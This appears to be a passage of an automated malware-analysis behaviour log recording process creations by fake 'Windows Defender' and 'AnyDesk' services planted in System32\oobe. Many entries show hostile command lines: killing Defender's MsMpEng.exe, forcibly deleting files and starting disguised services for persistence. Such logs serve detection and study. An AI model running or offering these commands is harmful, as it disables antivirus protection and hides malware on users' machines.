Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe installJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe installJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe installJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exeJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe installJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6552
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
